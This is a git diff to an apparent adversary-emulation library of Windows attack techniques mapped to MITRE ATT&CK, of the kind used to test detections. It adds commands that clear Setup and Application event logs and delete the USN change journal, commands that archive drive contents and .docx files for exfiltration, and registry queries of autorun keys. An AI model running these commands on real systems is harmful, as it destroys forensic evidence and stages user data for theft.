diff --git a/Windows/Defense Evasion/Indicator_Removal_on_Host.md b/Windows/Defense Evasion/Indicator_Removal_on_Host.md
index 635e4f78..5be6bba5 100644
--- a/Windows/Defense Evasion/Indicator_Removal_on_Host.md	
+++ b/Windows/Defense Evasion/Indicator_Removal_on_Host.md	
@@ -11,3 +11,17 @@ Clear system logs
 Clear Security logs
 
     wevtutil cl Security
+
+Clear Setup logs
+
+    wevtutil cl Setup
+
+Clear Application logs
+
+    wevtutil cl Application
+
+## Fsutil
+
+Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume.
+
+    fsutil usn deletejournal /D C:
diff --git a/Windows/Exfiltration/Data_Compressed.md b/Windows/Exfiltration/Data_Compressed.md
new file mode 100644
index 00000000..ac2307f9
--- /dev/null
+++ b/Windows/Exfiltration/Data_Compressed.md
@@ -0,0 +1,11 @@
+# File Deletion
+
+MITRE ATT&CK Technique: [T1002](https://attack.mitre.org/wiki/Technique/T1002)
+
+## PowerShell
+
+    powershell.exe dir c:\* -Recurse | Compress-Archive -DestinationPath C:\test\Data.zip
+
+## Rar
+
+    rar a -r exfilthis.rar *.docx
diff --git a/Windows/Payloads/Discovery.bat b/Windows/Payloads/Discovery.bat
index b7743df7..f11940f2 100644
--- a/Windows/Payloads/Discovery.bat
+++ b/Windows/Payloads/Discovery.bat
@@ -8,6 +8,23 @@ net config workstation
 net accounts
 net accounts /domain
 net view
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
+reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
 wmic useraccount list
 wmic useraccount get /ALL
 wmic startup list brief